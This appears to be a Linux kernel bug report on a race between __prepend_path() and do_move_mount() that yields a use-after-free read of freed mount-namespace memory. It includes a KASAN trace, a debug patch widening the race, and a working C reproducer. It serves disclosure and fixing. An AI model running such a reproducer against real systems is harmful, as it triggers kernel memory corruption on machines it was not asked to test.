As the subject says, there's a race between d_path() (specifically __prepend_path()) looking at mnt->mnt_ns with is_anon_ns(), and do_move_mount() switching out the ->mnt_ns and freeing the old one. This can theoretically lead to a use-after-free read, but it doesn't seem to be very interesting from a security perspective, since all it gets you is a comparison of a value in freed memory with zero. KASAN splat from a kernel that's been patched to widen the race window: ================================================================== BUG: KASAN: use-after-free in prepend_path (fs/mount.h:146 fs/d_path.c:127 fs/d_path.c:177) Read of size 8 at addr ffff88800add2748 by task SLOWME/685 CPU: 8 PID: 685 Comm: SLOWME Not tainted 6.0.0-rc5-00015-ge839a756012b-dirty #110 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014 Call Trace: <TASK> dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1)) print_report.cold (mm/kasan/report.c:318 mm/kasan/report.c:433) [...] kasan_report (mm/kasan/report.c:162 mm/kasan/report.c:497) [...] prepend_path (fs/mount.h:146 fs/d_path.c:127 fs/d_path.c:177) [...] __do_sys_getcwd (fs/d_path.c:438) [...] do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) [...] </TASK> Allocated by task 685: kasan_save_stack (mm/kasan/common.c:39) __kasan_kmalloc (mm/kasan/common.c:45 mm/kasan/common.c:437 mm/kasan/common.c:516 mm/kasan/common.c:525) alloc_mnt_ns (./include/linux/slab.h:600 ./include/linux/slab.h:733 fs/namespace.c:3426) __do_sys_fsmount (fs/namespace.c:3720) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) Freed by task 686: kasan_save_stack (mm/kasan/common.c:39) kasan_set_track (mm/kasan/common.c:45) kasan_set_free_info (mm/kasan/generic.c:372) ____kasan_slab_free (mm/kasan/common.c:369 mm/kasan/common.c:329) kfree (mm/slub.c:1780 mm/slub.c:3534 mm/slub.c:4562) do_move_mount (fs/namespace.c:2899) __x64_sys_move_mount (fs/namespace.c:3812 fs/namespace.c:3765 fs/namespace.c:3765) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120) The buggy address belongs to the object at ffff88800add2700 which belongs to the cache kmalloc-128 of size 128 The buggy address is located 72 bytes inside of 128-byte region [ffff88800add2700, ffff88800add2780) [...] Memory state around the buggy address: ffff88800add2600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff88800add2680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >ffff88800add2700: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff88800add2780: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff88800add2800: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ================================================================== To reproduce, apply this kernel patch to widen the race window: diff --git a/fs/d_path.c b/fs/d_path.c index e4e0ebad1f153..51fbed8deffe4 100644 --- a/fs/d_path.c +++ b/fs/d_path.c @@ -7,6 +7,7 @@ #include <linux/slab.h> #include <linux/prefetch.h> #include "mount.h" +#include <linux/delay.h> struct prepend_buffer { char *buf; @@ -117,6 +118,11 @@ static int __prepend_path(const struct dentry *dentry, const struct mount *mnt, } /* Global root */ mnt_ns = READ_ONCE(mnt->mnt_ns); + if (strcmp(current->comm, "SLOWME") == 0) { + pr_warn("%s: begin delay\n", __func__); + mdelay(1000); + pr_warn("%s: end delay\n", __func__); + } /* open-coded is_mounted() to use local mnt_ns */ if (!IS_ERR_OR_NULL(mnt_ns) && !is_anon_ns(mnt_ns)) return 1; // absolute root Then run this reproducer (build with "-pthread"): #define _GNU_SOURCE #include <pthread.h> #include <unistd.h> #include <err.h> #include <fcntl.h> #include <sys/syscall.h> #include <sys/stat.h> #include <sys/prctl.h> #include <sys/mount.h> #include <linux/mount.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) void fsconfig(int fd, unsigned int cmd, char *key, void *value, int aux) { SYSCHK(syscall(__NR_fsconfig, fd, cmd, key, value, aux)); } static int mnt_fd = -1; static void *thread_fn(void *dummy) { mkdir("/dev/shm/test", 0700); SYSCHK(syscall(__NR_move_mount, mnt_fd, "", AT_FDCWD, "/dev/shm/test", MOVE_MOUNT_F_EMPTY_PATH)); sleep(1); SYSCHK(umount2("/dev/shm/test", MNT_DETACH)); return NULL; } int main(void) { int fs_fd = SYSCHK(syscall(__NR_fsopen, "tmpfs", 0)); fsconfig(fs_fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0); mnt_fd = SYSCHK(syscall(__NR_fsmount, fs_fd, 0, MOUNT_ATTR_NOSUID | MOUNT_ATTR_NODEV)); SYSCHK(close(fs_fd)); SYSCHK(fchdir(mnt_fd)); pthread_t thread; if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, "pthread_create"); char buf[0x10000]; SYSCHK(prctl(PR_SET_NAME, "SLOWME")); SYSCHK(getcwd(buf, sizeof(buf))); SYSCHK(prctl(PR_SET_NAME, "dummy")); SYSCHK(chdir("/")); if (pthread_join(thread, NULL)) errx(1, "pthread_join"); SYSCHK(close(mnt_fd)); return 0; }